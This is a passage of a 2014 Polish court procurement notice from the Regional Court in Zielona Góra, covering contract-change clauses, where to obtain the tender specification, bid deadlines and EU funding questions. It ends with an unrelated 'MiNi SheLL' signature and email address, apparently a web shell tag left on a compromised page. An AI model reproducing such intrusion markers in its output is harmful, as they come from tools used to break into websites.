2.Ponadto Zamawiający ma prawo jednostronnie zobowiązać Wykonawcę do dokonania następujących zmian w przedmiocie umowy:
a)wykonać zamienne roboty w ramach poszczególnej części umowy lub jej elementu,
b)zmienić kolejność wykonania poszczególnych robót,
c)zmienić termin wykonania poszczególnych robót,
d)zmniejszenia zakresu przedmiotu umowy wraz z ograniczeniem należnego Wykonawcy wynagrodzenia
3.Zmiany wymienione w ust. 1 pkt. 1-6 dokonywane będą każdorazowo w formie aneksu pod rygorem nieważności, z zastrzeżeniem spełnienia szczególnych wymogów przewidzianych przepisami prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zielona-gora.so.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Zielonej Górze
65-958 Zielona Góra
 Plac Słowiański 1
(Oddział Gospodarczy).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2014 godzina 10:30, miejsce: Sąd Okręgowy w Zielonej Górze Pl. Słowiański 1, pok. nr 20 (Sekretariat Prezesa Sądu Okręgowego).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com